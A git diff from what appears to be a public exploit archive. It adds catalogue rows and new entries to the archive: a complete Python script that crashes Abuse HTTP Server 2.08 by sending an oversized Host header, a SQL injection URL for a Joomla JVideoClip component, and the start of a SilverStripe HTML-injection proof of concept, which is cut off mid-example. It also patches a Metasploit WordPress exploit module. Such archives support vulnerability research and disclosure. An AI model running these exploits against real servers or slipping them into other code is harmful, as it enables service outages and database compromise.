diff --git a/files.csv b/files.csv index 4effcd0b7..19b583e10 100755 --- a/files.csv +++ b/files.csv @@ -35014,6 +35014,7 @@ id,file,description,date,author,platform,type,port 38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0 +38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow Vulnerability",2013-08-28,"Marcos Accossatto",windows,remote,0 38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0 38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0 @@ -35043,5 +35044,9 @@ id,file,description,date,author,platform,type,port 38770,platforms/php/webapps/38770.txt,"MentalJS Sandbox Security Bypass Vulnerability",2013-09-20,"Rafay Baloch",php,webapps,0 38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 +38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0 38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 +38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0 +38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0 +38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 diff --git a/platforms/multiple/dos/38779.py b/platforms/multiple/dos/38779.py new file mode 100755 index 000000000..c88edbd21 --- /dev/null +++ b/platforms/multiple/dos/38779.py @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/62723/info + +Abuse HTTP Server is prone to a remote denial-of-service vulnerability. + +Attackers can exploit this issue to cause denial-of-service conditions. + +Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. + +#!/usr/bin/python + +import socket +import os +import sys + +crash = "0" * 504 + +buffer="GET / HTTP/1.1\r\n" +buffer+="Host: " + crash + "\r\n" +buffer+="Content-Type: application/x-www-form-urlencoded\r\n" +buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n" +buffer+="Content-Length : 1048580\r\n\r\n" + +print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com" +print "[*] Change some option in code with your self" +print "[*] Connect to host and send payload" + +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect(("192.168.1.101", 80)) +expl.send(buffer) +print "[*] Server Disconected" +expl.close() \ No newline at end of file diff --git a/platforms/php/remote/38660.rb b/platforms/php/remote/38660.rb index 20a378785..2dbe2afd4 100755 --- a/platforms/php/remote/38660.rb +++ b/platforms/php/remote/38660.rb @@ -8,7 +8,11 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::HTTP::Wordpress + # EDB note: + # This line causes an error when loading + # include Msf::Exploit::Remote::HTTP::Wordpress + # Replaced with the following: + include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) diff --git a/platforms/php/webapps/38777.txt b/platforms/php/webapps/38777.txt new file mode 100755 index 000000000..188efb8d2 --- /dev/null +++ b/platforms/php/webapps/38777.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/62610/info + +The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +JVideoClip 1.5.1 is vulnerable; other versions may also be affected. + +http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6 \ No newline at end of file diff --git a/platforms/php/webapps/38780.txt b/platforms/php/webapps/38780.txt new file mode 100755 index 000000000..43ca2c22f --- /dev/null +++ b/platforms/php/webapps/38780.txt @@ -0,0 +1,415 @@ +source: http://www.securityfocus.com/bid/62782/info + +SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. + +SilverStripe 3.0.5 is vulnerable; other versions may also be affected. + +Proof of Concept: +================= +1.1 +The first persistent input validation web vulnerability can be exploited +by remote attackers with low privileged application user accounts and +low required user interaction. For demonstration or reproduce ... + + +PoC: Groups & Rollen (Roles) - Print + +
+Vorname | Nachname |
---|
+Gedruckt am 11:44pm, 22/09/2013
+
+Gedruckt von a%20>"